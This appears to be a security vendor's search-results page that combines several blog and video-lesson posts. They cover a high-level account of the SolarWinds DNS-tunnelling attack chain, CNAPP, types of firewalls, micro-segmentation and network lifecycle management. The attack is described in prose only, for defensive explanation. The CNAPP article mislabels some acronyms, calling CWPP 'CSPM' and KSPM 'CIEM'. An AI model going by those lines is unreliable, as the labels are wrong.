Search results

The aim of this post is to provide a very high-level illustration of the DNS Tunneling method used in the SolarWinds supply chain attack.... Cloud Security DNS Tunneling In The SolarWinds Supply Chain Attack Rony Moshkovich 2 min read Rony Moshkovich Short bio about author here Lorem ipsum dolor sit amet consectetur. Vitae donec tincidunt elementum quam laoreet duis sit enim. Duis mattis velit sit leo diam. Tags Share this article 12/23/20 Published The aim of this post is to provide a very high-level illustration of the DNS Tunneling method used in the SolarWinds supply chain attack . An Attacker compromises SolarWinds company and trojanizes a DLL that belongs to its software. Some of the customers receive the malicious DLL as an update for the SolarWinds Orion software. “Corporation XYZ” receives the malicious and digitally signed DLL via update. SolarWinds Orion software loads the malicious DLL as a plugin. Once activated, the DLL reads a local domain name “local.corp-xyz.com” (a fictious name). The malware encrypts the local domain name and adds it to a long domain name. The long domain name is queried with a DNS server (can be tapped by a passive DNS sensor). The recursive DNS server is not authorized to resolve avsvmcloud[.]com, so it forwards the request. An attacker-controlled authoritative DNS server resolves the request with a wildcard A record. The Attacker checks the victim’s name, then adds a CNAME record for the victim’s domain name. The new CNAME record resolves the long domain name into an IP of an HTTP-based C2 server. The malicious DLL downloads and executes the 2nd stage malware (TearDrop, Cobalt Strike Beacon). A Threat Researcher accesses the passive DNS (pDNS) records. One of the long domain names from the pDNS records is decrypted back into “local.corp-xyz.com”. The Researcher deducts that the decrypted local domain name belongs to “Corporation XYZ”. Schedule a demo Related Articles 2025 in review: What innovations and milestones defined AlgoSec’s transformative year in 2025? AlgoSec Reviews Mar 19, 2023 · 2 min read Navigating Compliance in the Cloud AlgoSec Cloud Mar 19, 2023 · 2 min read 5 Multi-Cloud Environments Cloud Security Mar 19, 2023 · 2 min read Speak to one of our experts Speak to one of our experts Work email* First name* Last name* Company* country* Select country... Short answer* By submitting this form, I accept AlgoSec's privacy policy Schedule a call

Security Policy Management with Professor Wool Micro-Segmentation Implementing a micro-segmentation strategy in the data center blocks lateral movement and helps protect the organization from cyberthreats. Watch this whiteboard video series on micro-segmentation and learn why and how to segment the data center, how to future-proof your policies and about the ongoing maintenance of a micro-segmented data center. Lesson 1 In this video, Prof. Wool introduces micro-segmentation: reasons for segmenting the data center, challenges, required steps when deploying a micro-segmentation strategy, and how to future-proof your policies. Introduction to Micro-segmentation Watch Lesson 2 Watch Prof. Wool as he shares tips on how to prepare for network segmentation by identifying the segment borders. Micro-segmentation – Mapping Existing Applications Watch Lesson 3 Watch this Prof. Wool video to learn how to define logical segments within a micro-segmentation project. Micro-segmentation – Defining Logical Segments Watch Lesson 4 In this video, Prof. Wool demonstrates how to generate a filtering policy during a micro-segmentation project. Micro-segmentation – Generating a Filtering Policy Watch Lesson 5 Watch this Prof. Wool video to learn about the ongoing maintenance of your data center upon completion of a micro-segmentation project. Micro-segmentation Ongoing Maintenance Watch Have a Question for Professor Wool? Ask him now Choose a better way to manage your network Choose a better way to manage your network Work email* First name* Last name* Company* country* Select country... Short answer* By submitting this form, I accept AlgoSec's privacy policy Continue

Cloud environments are complex and dynamic. Due to the complexity and multifacetedness of cloud technologies, cloud-native applications... Cloud Security What is a Cloud-Native Application Protection Platform (CNAPP) Ava Chawla 2 min read Ava Chawla Short bio about author here Lorem ipsum dolor sit amet consectetur. Vitae donec tincidunt elementum quam laoreet duis sit enim. Duis mattis velit sit leo diam. Tags Share this article 11/24/22 Published Cloud environments are complex and dynamic. Due to the complexity and multifacetedness of cloud technologies, cloud-native applications are challenging to safeguard. As a result, security teams use multiple security solutions, like CWPP and CSPM, to protect applications. The problem with this approach is that handling multiple security tools is laborious, time-consuming, and inefficient. Cloud-native application protection platform (CNAPP) is a new cloud security solution that promises to solve this problem. What is CNAPP? A cloud-native application protection platform (CNAPP) is an all-in-one tool with the capabilities of different cloud-native security tools. It combines the security features of multiple tools and provides comprehensive protection – from the development and configuration stages to deployment and runtime. Container security is here to stay A CNAPP combines CSPM, CIEM, IAM, CWPP, and more in one tool. It streamlines cloud security monitoring, threat detection, and remediation processes. The all-in-one platform gives organizations better visibility into threats and vulnerabilities. Instead of using multiple tools to receive alerts and formulate a remediation plan, a CNAPP minimizes complexity and enables security teams to monitor and draw insights from a single platform. How Does CNAPP Work and Why is it So Important to Have? This new cloud security approach offers the capabilities of multiple security tools in one software. Some of these security functions include Cloud Security Posture Management (CSPM), Infrastructure-as-Code (IaC) Scanning, Cloud Workload Protection Platform (CWPP), Cloud Network Security Connectivity (CNSC), and Kubernetes Security Posture Management (CIEM). The all-in-one platform centralizes insights, enabling security professionals to monitor and analyze data from the same space. A CNAPP identifies risks with strong context, provides detailed alerts, and offers automation features to fix vulnerabilities and misconfigurations. A CNAPP is essential because it reduces complexity and minimizes overhead. Given how complex and dynamic the cloud environments are, organizations are faced with enormous security threats. Enterprises deploy applications on multiple private and public clouds leveraging various dynamic, mixed technologies. This makes securing cloud assets significantly challenging. To cope with the complexity, security operations teams rely on multiple cloud security solutions. SecOps use various solutions to protect modern development practices, such as containers, Kubernetes, serverless functions, CI/CD pipelines, and infrastructure as code (IaC). This approach has been helpful. That said, it’s laborious and inefficient. In addition to not providing a broad view of security risks, dealing with multiple tools negatively impacts accuracy and decreases productivity. Having to correlate data from several platforms leads to errors and delayed responses. A CNAPP takes care of these problems by combining the functionalities of multiple tools in one software. It protects every stage of the cloud application lifecycle, from development to runtime. Leveraging advanced analytics and remediation automation, CNAPPs help organizations address cloud-native risks, harden applications, and institute security best practices. What Problems Does a CNAPP Solve? This new category of cloud application security tool is revolutionizing the cybersecurity landscape. It solves major challenges DevSecOps have been dealing with. That said, a CNAPP helps security teams to solve the following problems. 1. Enhancing Visibility and Quantifying Risks A CNAPP offers a broader visibility of security risks. It leverages multiple security capabilities to enable DevOps and DevSecOps to spot and fix potential security issues throughout the entire application lifecycle. The all-in-one security platform enables teams to keep tabs on all cloud infrastructures ( like apps, APIs, and classified data) and cloud services (like AWS, Azure, and Google Cloud). In addition, it provides insights that help security teams to quantify risks and formulate data-driven remediation strategies. 2. Combined Cloud Security Solution A CNAPP eliminates the need to use multiple cloud-native application protection solutions. It provides all the features needed to detect and solve security issues. Scanning, detection, notification, and reporting are consolidated in one software. This reduces human error, shortens response time, and minimizes the cost of operation. 3. Secure Software Development It reinforces security at every stage of the application lifecycle. The tool helps DevOps teams to shift left, thus minimizing the incidence of vulnerabilities or security issues at runtime. 4. Team Collaboration Collaboration is difficult and error-prone when teams are using multiple tools. Data correlation and analysis take more time since team members have more than one tool to deal with. A CNAPP is a game-changer! It has advanced workflows, data correlation, analytics, and remediation features. These functionalities enhance team collaboration and increase productivity. What are CNAPP Features and Capabilities/Key Components of CNAPP? Even though the features and capabilities of CNAPPs differ (based on vendors), there are key components an effective CNAPP should have. That being said, here are the seven key components: Cloud Security Posture Management (CSPM) A CSPM solution focuses on maintaining proper cloud configuration. It monitors, detects, and fixes misconfigurations & compliance violations. CSPM monitors cloud resources and alerts security teams when a non-compliant resource is identified. Infrastructure-as-Code (IaC) Scanning IaC Scanning enables the early detection of errors (misconfigurations) in code. Spotting misconfigurations before deployment helps to avoid vulnerabilities at runtime. This tool is used to carry out some kind of code review. The purpose is to ensure code quality by scanning for vulnerable points, compliance issues, and violations of policies. Cloud Workload Protection Platform (CWPP) Cloud workload protection platform (CSPM) secures cloud workloads, shielding your resources from security threats. CSPM protects various workloads, from virtual machines (VMs) and databases to Kubernetes and containers. A CWPP monitors and provides insights to help security teams prevent security breaches. Cloud Network Security Connectivity (CNSC) Cloud Network Security Connectivity (CNSC) provides complete real-time visibility and access to risks across all your cloud resources and accounts. This cloud security solution allows you to explore the risks, activate security rules, and suppress whole risks or risk triggers, export risk trigger details, access all network rules in the context of their policy sets and create risk reports. Kubernetes Security Posture Management (KSPM) Kubernetes security posture management (KSPM) capability enables organizations to maintain standard security posture by preventing Kubernetes misconfigurations and compliance violations. KSPM solution, similar to Cloud Security Posture Management (CSPM), automates Kubernetes security, reinforces compliance, identifies misconfigurations, and monitors Kubernetes clusters to ensure maximum security. Cloud Infrastructure Entitlement Management (CIEM) A Cloud Infrastructure Entitlement Management (CIEM) tool is used to administer permissions and access policies. To maintain the integrity of cloud and multi-cloud environments, identities and access privileges must be regulated. This is where CIEM comes in! CIEM solutions, also known as Cloud permissions Management Solutions, help organizations prevent data breaches by enforcing the principle of least privileges. Integration to Software Development Activities This component of CNAPP focuses on integrating cloud-native application protection solutions into the development phase to improve reliability and robustness in the CI/CD pipeline stage. What are the Benefits of CNAPP? Transitioning from using multiple cloud security tools to implementing a CNAPP solution can benefit your company in many ways. Some benefits include: 1. Streamlines Security Operations Managing multiple security tools decreases efficiency and leads to employee burnout. Correlating data from different software is laborious and error-prone. It prolongs response time. A CNAPP streamlines activities by giving security teams broad visibility from a single tool. This makes monitoring and remediation easier than ever – making security teams more efficient and productive. 2. Better Visibility into Risks A CNAPP provides better visibility into security risks associated with your cloud infrastructure. It covers all aspects of cloud-native application protection, providing security teams with the necessary insights to close security gaps, harden applications, and ward off threats. 3. Improves Security With Automation Risk detection and vulnerability management are automated. Automation of security tasks increases reliability, reduces human error, and enables rapid response to threats. It combines automation and advanced analytics to offer organizations accurate insights into risks. 4. Reduces the Number of Bug Fixes A CNAPP prevents vulnerabilities at runtime by detecting threats and errors in the CI/CD pipeline phases. This approach improves DevOps team productivity and decreases the number of bug fixes after deployment. In other words, shifting left ensures the deployment of high-quality code. 5. Reduces Overhead Costs If you want to cut down the cost of operation, consider choosing a CNAPP over CSPM and other standalone cloud security tools. It reduces overhead by eliminating the need to operate and maintain multiple cloud security solutions. AlgoSec CNAPP with Prevasio and CloudFlow Cloud environments are increasingly complex and dynamic. Maintaining secure cloud infrastructures has become more challenging than ever. Security teams rely on multiple tools to gain visibility into risks. CNAPPs promise to fix the challenges of using multiple solutions to protect cloud-native applications. Gartner, the first to describe the CNAPP category, encourages organizations to consider emerging CNAPP providers and adopt an all-in-one security approach that takes care of the entire life cycle of applications – covering development and runtime protection. Prevasio makes transitioning to a CNAPP a fantastic experience. Prevasio takes pride in helping organizations protect their cloud-native applications and other cloud assets. Prevasio’s agentless cloud-native application protection platform (CNAPP) offers increased risk visibility and enables security teams to reinforce best practices. Contact us to learn how we can help you manage your cloud security. Schedule a demo Related Articles 2025 in review: What innovations and milestones defined AlgoSec’s transformative year in 2025? AlgoSec Reviews Mar 19, 2023 · 2 min read Navigating Compliance in the Cloud AlgoSec Cloud Mar 19, 2023 · 2 min read 5 Multi-Cloud Environments Cloud Security Mar 19, 2023 · 2 min read Speak to one of our experts Speak to one of our experts Work email* First name* Last name* Company* country* Select country... Short answer* By submitting this form, I accept AlgoSec's privacy policy Schedule a call

Security Policy Management with Professor Wool Next Generation Firewalls Next Generation Firewalls (NGFWs) with Professor Wool is a whiteboard-style series of lessons that examine the some of the challenges of and provide technical tips for managing security policies on NGFWs across in evolving enterprise networks and data centers. Lesson 1 In this lesson, Professor Wool examines next-generation firewalls and the granular capabilities they provide for improved control over applications and users. Next-Generation Firewalls: Overview of Application and User-Aware Policies Watch Lesson 2 In this lesson, Professor Wool examines the pros and cons of whitelisting and blacklisting policies and offers some recommendations on policy considerations. NGFWs – Whitelisting & Blacklisting Policy Considerations Watch Lesson 3 Next generation firewalls (NGFWs) allow you to manage security policies with much greater granularity, based on specific applications and users, which provides much greater control over the traffic you want to allow or deny. Today, NGFWs are usually deployed alongside traditional firewalls. Therefore change requests need to be written using each firewall type’s specific terminology; application names and default ports for NGFWs, and actual protocols and ports for traditional firewalls. This new lesson explains some of challenges of writing firewall rules for a mixed firewall environment, and how to address them. Managing Your Security Policy in a Mixed Next Gen and Traditional Firewall Environment Watch Lesson 4 As part of the blacklisting approach to application security, most NGFW vendors now offer their customers a subscription based service that provides periodic updates to firewall definitions and signatures for a great number of applications especially the malicious ones. In this lesson, Professor Wool discusses the pros and cons of this offering for cyber threat prevention. It also discusses the limitations of this service when home-grown applications are deployed in the enterprise, and provides a recommendation on how to solve this problem. Using Next Generation Firewalls for Cyber Threat Prevention Watch Have a Question for Professor Wool? Ask him now Choose a better way to manage your network Choose a better way to manage your network Work email* First name* Last name* Company* country* Select country... Short answer* By submitting this form, I accept AlgoSec's privacy policy Continue

Firewalls form the first line of defense against intrusive hackers trying to infiltrate internal networks and steal sensitive data. They... Firewall Change Management 5 Types of Firewalls for Enhanced Network Security Asher Benbenisty 2 min read Asher Benbenisty Short bio about author here Lorem ipsum dolor sit amet consectetur. Vitae donec tincidunt elementum quam laoreet duis sit enim. Duis mattis velit sit leo diam. Tags Share this article 10/25/23 Published Firewalls form the first line of defense against intrusive hackers trying to infiltrate internal networks and steal sensitive data. They act as a barrier between networks, clearly defining the perimeters of each. The earliest generation of packet-filter firewalls were rudimentary compared to today’s next-generation firewalls, but cybercrime threats were also less sophisticated. Since then, cybersecurity vendors have added new security features to firewalls in response to emerging cyber threats. Today, organizations can choose between many different types of firewalls designed for a wide variety of purposes. Optimizing your organization’s firewall implementation requires understanding the differences between firewalls and the network layers they protect. How Do Firewalls Work? Firewalls protect networks by inspecting data packets as they travel from one place to another. These packets are organized according to the transmission control protocol/internet protocol (TCP/IP), which provides a standard way to organize data in transit. This protocol is a concise version of the more general OSI model commonly used to describe computer networks. These frameworks allow firewalls to interpret incoming traffic according to strictly defined standards. Security experts use these standards to create rules that tell firewalls what to do when they detect unusual traffic. The OSI model has seven layers: Application Presentation Session Transport Network Data link Physical Most of the traffic that reaches your firewall will use one of the three major Transport layer protocols in this model, TCP, UDP, or ICMP. Many security experts focus on TCP rules because this protocol uses a three-step TCP handshake to provide a reliable two-way connection. The earliest firewalls only operated on the Network Layer, which provides information about source and destination IP addresses, protocols, and port numbers. Later firewalls added Transport Layer and Application Layer functionality. The latest next-generation firewalls go even further, allowing organizations to enforce identity-based policies directly from the firewall. Related Read : Host-Based vs. Network-Based Firewalls 1. Traditional Firewalls Packet Filtering Firewalls Packet-filtering firewalls only examine Network Layer data, filtering out traffic according to the network address, the protocol used, or source and destination port data. Because they do not inspect the connection state of individual data packets, they are also called stateless firewalls. These firewalls are simple and they don’t support advanced inspection features. However, they offer low latency and high throughput, making them ideal for certain low-cost inline security applications. Stateful Inspection Firewalls When stateful firewalls inspect data packets, they capture details about active sessions and connection states. Recording this data provides visibility into the Transport layer and allows the firewall to make more complex decisions. For example, a stateful firewall can mitigate a denial-of-service attack by comparing a spike in incoming traffic against rules for making new connections – stateless firewalls don’t have a historical record of connections to look up. These firewalls are also called dynamic packet-filtering firewalls. They are generally more secure than stateless firewalls but may introduce latency because it takes time to inspect every data packet traveling through the network. Circuit-Level Gateways Circuit-level gateways act as a proxy between two devices attempting to connect with one another. These firewalls work on the Session layer of the OSI model, performing the TCP handshake on behalf of a protected internal server. This effectively hides valuable information about the internal host, preventing attackers from conducting reconnaissance into potential targets. Instead of inspecting individual data packets, these firewalls translate internal IP addresses to registered Network Address Translation (NAT) addresses. NAT rules allow organizations to protect servers and endpoints by preventing their internal IP address from being public knowledge. 2. Next-Generation Firewalls (NGFWs) Traditional firewalls only address threats from a few layers in the OSI model. Advanced threats can bypass these Network and Transport Layer protections to attack web applications directly. To address these threats, firewalls must be able to analyze individual users, devices, and data assets as they travel through complex enterprise networks. Next-generation firewalls achieve this by looking beyond the port and protocol data of individual packets and sessions. This grants visibility into sophisticated threats that simpler firewalls would overlook. For example, a traditional firewall may block traffic from an IP address known for conducting denial-of-service attacks. Hackers can bypass this by continuously changing IP addresses to confuse and overload the firewall, which may allow routing malicious traffic to vulnerable assets. A next-generation firewall may notice that all this incoming traffic carries the same malicious content. It may act as a TCP proxy and limit the number of new connections made per second. When illegitimate connections fail the TCP handshake, it can simply drop them without causing the organization’s internal systems to overload. This is just one example of what next-gen firewalls are capable of. Most modern firewall products combine a wide variety of technologies to provide comprehensive perimeter security against comprehensive cyber attacks. How do NGFWs Enhance Network Security? Deep Packet Inspection (DPI) : NGFWs go beyond basic packet filtering by inspecting the content of data packets. They analyze the actual data payload and not just header information. This allows them to identify and block threats within the packet content, such as malware, viruses, and suspicious patterns. Application-Level Control : NGFWs can identify and control applications and services running on the network. This enables administrators to define and enforce policies based on specific applications, rather than just port numbers. For example, you can allow or deny access to social media sites or file-sharing applications. Intrusion Prevention Systems (IPS) : NGFWs often incorporate intrusion prevention capabilities. They can detect and prevent known and emerging cyber threats by comparing network traffic patterns against a database of known attack signatures. This proactive approach helps protect against various cyberattacks. Advanced Threat Detection: NGFWs use behavioral analysis and heuristics to detect and block unknown or zero-day threats. By monitoring network traffic for anomalies, they can identify suspicious behavior and take action to mitigate potential threats. U ser and Device Identification : NGFWs can associate network traffic with specific users or devices, even in complex network environments. This user/device awareness allows for more granular security policies and helps in tracking and responding to security incidents effectively. Integration with Security Ecosystem : NGFWs often integrate with other security solutions, such as antivirus software, intrusion detection systems (IDS), and security information and event management (SIEM) systems. This collaborative approach provides a multi-layered defense strategy . Security Automation : NGFWs can automate threat response and mitigation. For example, they can isolate compromised devices from the network or initiate other predefined actions to contain threats swiftly. In a multi-layered security environment, these firewalls often enforce the policies established by security orchestration, automation, and response (SOAR) platforms. Content Filtering : NGFWs can filter web content, providing URL filtering and content categorization. This helps organizations enforce internet usage policies and block access to potentially harmful or inappropriate websites. Some NGFWs can even detect outgoing user credentials (like an employee’s Microsoft account password) and prevent that content from leaving the network. VPN and Secure Remote Access : NGFWs often include VPN capabilities to secure remote connections. This is crucial for ensuring the security of remote workers and branch offices. Advanced firewalls may also be able to identify malicious patterns in external VPN traffic, protecting organizations from threat actors hiding behind encrypted VPN providers. Cloud-Based Threat Intelligence : Many NGFWs leverage cloud-based threat intelligence services to stay updated with the latest threat information. This real-time threat intelligence helps NGFWs identify and block emerging threats more effectively. Scalability and Performance : NGFWs are designed to handle the increasing volume of network traffic in modern networks. They offer improved performance and scalability, ensuring that security does not compromise network speed. Logging and Reporting : NGFWs generate detailed logs and reports of network activity. These logs are valuable for auditing, compliance, and forensic analysis, helping organizations understand and respond to security incidents. 3. Proxy Firewalls Proxy firewalls are also called application-level gateways or gateway firewalls. They define which applications a network can support, increasing security but demanding continuous attention to maintain network functionality and efficiency. Proxy firewalls provide a single point of access allowing organizations to assess the threat posed by the applications they use. It conducts deep packet inspection and uses proxy-based architecture to mitigate the risk of Application Layer attacks. Many organizations use proxy servers to segment the parts of their network most likely to come under attack. Proxy firewalls can monitor the core internet protocols these servers use against every application they support. The proxy firewall centralizes application activity into a single server and provides visibility into each data packet processed. This allows the organization to maintain a high level of security on servers that make tempting cyberattack targets. However, these servers won’t be able to support new applications without additional firewall configuration. These types of firewalls work well in highly segmented networks that allow organizations to restrict access to sensitive data without impacting usability and production. 4. Hardware Firewalls Hardware firewalls are physical devices that secure the flow of traffic between devices in a network. Before cloud computing became prevalent, most firewalls were physical hardware devices. Now, organizations can choose to secure on-premises network infrastructure using hardware firewalls that manage the connections between routers, switches, and individual devices. While the initial cost of acquiring and configuring a hardware firewall can be high, the ongoing overhead costs are smaller than what software firewall vendors charge (often an annual license fee). This pricing structure makes it difficult for growing organizations to rely entirely on hardware devices. There is always a chance that you end up paying for equipment you don’t end up using at full capacity. Hardware firewalls offer a few advantages over software firewalls: They avoid using network resources that could otherwise go to value-generating tasks. They may end up costing less over time than a continuously renewed software firewall subscription fee. Centralized logging and monitoring can make hardware firewalls easier to manage than complex software-based deployments. 5. Software Firewalls Many firewall vendors provide virtualized versions of their products as software. They typically charge an annual licensing fee for their firewall-as-a-service product, which runs on any suitably provisioned server or device. Some software firewall configurations require the software to be installed on every computer in the network, which can increase the complexity of deployment and maintenance over time. If firewall administrators forget to update a single device, it may become a security vulnerability. At the same time, these firewalls don’t have their own operating systems or dedicated system resources available. They must draw computing power and memory from the devices they are installed on. This leaves less power available for mission-critical tasks. However, software firewalls carry a few advantages compared to hardware firewalls: The initial subscription-based cost is much lower, and many vendors offer a price structure that ensures you don’t pay for resources you don’t use. Software firewalls do not take up any physical space, making them ideal for smaller organizations. The process of deploying software firewalls often only takes a few clicks. With hardware firewalls, the process can involve complex wiring and time-consuming testing. Advanced Threats and Firewall Solutions Most firewalls are well-equipped to block simple threats, but advanced threats can still cause problems. There are many different types of advanced threats designed to bypass standard firewall policies. Advanced Persistent Threats (APTs) often compromise high-level user accounts and slowly spread throughout the network using lateral movement. They may move slowly, gathering information and account credentials over weeks or months before exfiltrating the data undetected. By moving slowly, these threats avoid triggering firewall rules. Credential-based attacks bypass simple firewall rules by using genuine user credentials to carry out attacks. Since most firewall policies trust authenticated users, attackers can easily bypass rules by stealing user account credentials. Simple firewalls can’t distinguish between normal traffic and malicious traffic by an authenticated, signed-in user. Malicious insiders can be incredibly difficult to detect. These are genuine, authenticated users who have decided to act against the organization’s interest. They may already know how the firewall system works, or have privileged access to firewall configurations and policies. Combination attacks may target multiple security layers with separate, independent attacks. For example, your cloud-based firewalls may face a Distributed Denial of Service (DDoS) attack while a malicious insider exfiltrates information from the cloud. These tactics allow hackers to coordinate attacks and cover their tracks. Only next-generation firewalls have security features that can address these types of attack. Anti-data exfiltration tools may prevent users from sending their login credentials to unsecured destinations, or prevent large-scale data exfiltration altogether. Identity-based policies may block authenticated users from accessing assets they do not routinely use. Firewall Configuration and Security Policies The success of any firewall implementation is determined by the quality of its security rules. These rules decide which types of traffic the firewall will allow to pass, and what traffic it will block. In a modern network environment, this is done using four basic types of firewall rules: Access Control Lists (ACLs). These identify the users who have permission to access a certain resource or asset. They may also dictate which operations are allowed on that resource or asset. Network Address Translation (NAT) rules. These rules protect internal devices by hiding their original IP address from the public Internet. This makes it harder for hackers to gain unauthorized access to system resources because they can’t easily target individual devices from outside the network. Stateful packet filtering . This is the process of inspecting data packets in each connection and determining what to do with data flows that do not appear genuine. Stateful firewalls keep track of existing connections, allowing them to verify the authentication of incoming data that claims to be part of an already established connection. Application-level gateways. These firewall rules provide application-level protection, preventing hackers from disguising malicious traffic as data from (or for) an application. To perform this kind of inspection, the firewall must know what normal traffic looks like for each application on the network, and be able to match incoming traffic with those applications. Network Performance and Firewalls Firewalls can impact network performance and introduce latency into networks. Optimizing network performance with firewalls is a major challenge in any firewall implementation project. Firewall experts use a few different approaches to reduce latency and maintain fast, reliable network performance: Installing hardware firewalls on high-volume routes helps, since separate physical devices won’t draw computing resources away from other network devices. Using software firewalls in low-volume situations where flexibility is important. Sometimes, being able to quickly configure firewall rules to adapt to changing business conditions can make a major difference in overall network performance. Configuring servers to efficiently block unwanted traffic is a continuous process. Server administrators should avoid overloading firewalls with denied outbound requests that strain firewalls at the network perimeter. Firewall administrators should try to distribute unwanted traffic across multiple firewalls and routers instead of allowing it to concentrate on one or two devices. They should also try reducing the complexity of the firewall rule base and minimize overlapping rules. Schedule a demo Related Articles 2025 in review: What innovations and milestones defined AlgoSec’s transformative year in 2025? AlgoSec Reviews Mar 19, 2023 · 2 min read Navigating Compliance in the Cloud AlgoSec Cloud Mar 19, 2023 · 2 min read 5 Multi-Cloud Environments Cloud Security Mar 19, 2023 · 2 min read Speak to one of our experts Speak to one of our experts Work email* First name* Last name* Company* country* Select country... Short answer* By submitting this form, I accept AlgoSec's privacy policy Schedule a call

Behind every important business process is a solid network infrastructure that lets us access all of these services. But for an efficient... Application Connectivity Management Understanding network lifecycle management Tsippi Dach 2 min read Tsippi Dach Short bio about author here Lorem ipsum dolor sit amet consectetur. Vitae donec tincidunt elementum quam laoreet duis sit enim. Duis mattis velit sit leo diam. Tags Share this article 7/4/23 Published Behind every important business process is a solid network infrastructure that lets us access all of these services. But for an efficient and available network, you need an optimization framework to maintain a strong network lifecycle. It can be carried out as a lifecycle process to ensure continuous monitoring, management, automation, and improvement. Keep in mind, there are many solutions to help you with connectivity management . Regardless of the tools and techniques you follow, there needs to be a proper lifecycle plan for you to be able to manage your network efficiently. Network lifecycle management directs you on reconfiguring and adapting your data center per your growing requirements. The basic phases of a network lifecycle In the simplest terms, the basic phases of a network lifecycle are Plan, Build, and Manage. These phases can also be called Design, Implement, and Operate (DIO). Now, in every single instance where you want to change your network, you repeat this process of designing, implementing, and managing the changes. And every subtask that is carried out as part of the network management can also follow the same lifecycle phases for a more streamlined process . Besides the simpler plan, build, and manage phases, certain network frameworks also provide additional phases depending on the services and strategies involved. ITIL framework ITIL stands for Information Technology Infrastructure Library, which is an IT management framework. ITIL put forth a similar lifecycle process focusing on the network services aspect. The phases, as per ITIL, are: Service strategy Service design Service transition Service operations Continual service improvement PPDIOO framework PPDIOO is a network lifecycle model proposed by Cisco, a learning network services provider. This framework adds to the regular DIO framework with several subtasks, as explained below. Plan Prepare The overall organizational requirements, network strategy, high-level conceptual architecture, technology identification, and financial planning are all carried out in this phase. Plan Planning involves identifying goal-based network requirements, user needs, assessment of any existing network, gap analysis, and more. The tasks are to analyze if the existing infrastructure or operating environment can support the proposed network solution. The project plan is then drafted to align with the project goals regarding cost, resources, and scope. Design Network design experts develop a detailed, comprehensive network design specification depending on the findings and project specs derived from previous phases. Build The build phase is further divided into individual implementation tasks as part of the network implementation activities. This can include procurement, integrating devices, and more. The actual network solution is built as per the design, focusing on ensuring service availability and security. Operate The operational phase involves network maintenance, where the design’s appropriateness is tested. The network is monitored and managed to maintain high availability and performance while optimizing operational costs. Optimize The operational phase gives important data that can be utilized to optimize the performance of the network implementation further. This phase acts as a proactive mechanism to identify and solve any flaws or vulnerabilities within the network. It may involve network redesign and thus start a new cycle as well. Why develop a lifecycle optimization plan? A lifecycle approach to network management has various use cases. It provides an organized process, making it more cost-effective and less disruptive to existing services. Reduced total network ownership cost Early on, planning and identifying the exact network requirements and new technologies allow you to carry out a successful implementation that aligns with your budget constraints. Since there is no guesswork with a proper plan, you can avoid redesigns and rework, thus reducing any cost overheads. High network availability Downtimes are a curse to business goals. Each second that goes by without access to the network can be bleeding money. Following a proper network lifecycle management model allows you to plan your implementation with less to no disruptions in availability. It also helps you update your processes and devices before they get into an outage issue. Proactive monitoring and management, as proposed by lifecycle management, goes a long way in avoiding unexpected downtimes. This also saves time with telecom troubleshooting. Better business agility Businesses that adapt better thrive better. Network lifecycle management allows you to take the necessary action most cost-effectively in case of any quick economic changes. It helps you prepare your systems and operations to accommodate the new network changes before they are implemented. It also provides a better continuous improvement framework to keep your systems up to date and adds to cybersecurity. Improved speed of access Access to the network, the faster it is, the better your productivity can be. Proper lifecycle management can improve service delivery efficiency and resolve issues without affecting business continuity. The key steps to network lifecycle management Let us guide you through the various phases of network lifecycle management in a step-by-step approach. Prepare Step 1: Identify your business requirements Establish your goals, gather all your business requirements, and arrive at the immediate requirements to be carried out. Step 2: Create a high-level architecture design Create the first draft of your network design. This can be a conceptual model of how the solution will work and need not be as detailed as the final design would be. Step 3: Establish the budget Do the financial planning for the project detailing the possible challenges, budget, and expected profits/outcomes from the project. Plan Step 4: Evaluate your current system This step is necessary to properly formulate an implementation plan that will be the least disruptive to your existing services. Gather all relevant details, such as the hardware and software apps you use in your network. Measure the performance and other attributes and assess them against your goal specifics. Step 5: Conduct Gap Analysis Measure the current system’s performance levels and compare them with the expected outcomes that you want to achieve. Step 6: Create your implementation plan With the collected information, you should be able to draft the implementation plan for your network solution. This plan should essentially contain the various tasks that must be carried out, along with information on milestones, responsibilities, resources, and financing options. Design Step 7: Create a detailed network design Expand on your initial high-level concept design to create a comprehensive and detailed network design. It should have all the relevant information required to implement your network solution. Take care to include all necessary considerations regarding your network’s availability, scalability, performance, security, and reliability. Ensure the final design is validated by a proper approval process before being okayed for implementation. Implementation Step 8: Create an implementation plan The Implementation phase must have a detailed plan listing all the tasks involved, the steps to rollback, time estimations, implementation guidelines, and all the other details on how to implement the network design. Step 9: Testing Before implementing the design in the production environment, starting with a lab setting is a good idea. Implement in a lab testing environment to check for any errors and how feasible it is to implement the design. Improve the design depending on the results of this step. Step 10: Pilot implementation Implement in an iterative process starting with smaller deployments. Start with pilot implementations, test the results, and if all goes well, you can move towards wide-scale implementation. Step 11: Full deployment When your pilot implementation has been successful, you can move toward a full-scale deployment of network operations. Operate Step 12: Measure and monitor When you move to the Operational phase, the major tasks will be monitoring and management. This is probably the longest phase, where you take care of the day-to-day operational activities such as: Health maintenance Fault detection Proactive monitoring Capacity planning Minor updates (MACs – Moves, Adds, and Changes) Optimize Step 13: Optimize the network design based on the collected metrics. This phase essentially kicks off another network cycle with its own planning, designing, workflows, and implementation. Integrate network lifecycle with your business processes First, you must understand the importance of network lifecycle management and how it impacts your business processes and IT assets. Understand how your business uses its network infrastructure and how a new feature could add value. For instance, if your employees work remotely, you may have to update your infrastructure and services to allow real-time remote access and support personal network devices. Any update or change to your network should follow proper network lifecycle management to ensure efficient network access and availability. Hence, it must be incorporated into the company’s IT infrastructure management process. As a standard, many companies follow a three-year network life cycle model where one-third of the network infrastructure is upgraded to keep up with the growing network demands and telecommunications technology updates. Automate network lifecycle management with AlgoSec AlgoSec’s unique approach can automate the entire security policy management lifecycle to ensure continuous, secure connectivity for your business applications. The approach starts with auto discovering application connectivity requirements, and then intelligently – and automatically – guides you through the process of planning changes and assessing the risks, implementing those changes and maintaining the policy, and finally decommissioning firewall rules when the application is no longer in use. Schedule a demo Related Articles 2025 in review: What innovations and milestones defined AlgoSec’s transformative year in 2025? AlgoSec Reviews Mar 19, 2023 · 2 min read Navigating Compliance in the Cloud AlgoSec Cloud Mar 19, 2023 · 2 min read 5 Multi-Cloud Environments Cloud Security Mar 19, 2023 · 2 min read Speak to one of our experts Speak to one of our experts Work email* First name* Last name* Company* country* Select country... Short answer* By submitting this form, I accept AlgoSec's privacy policy Schedule a call

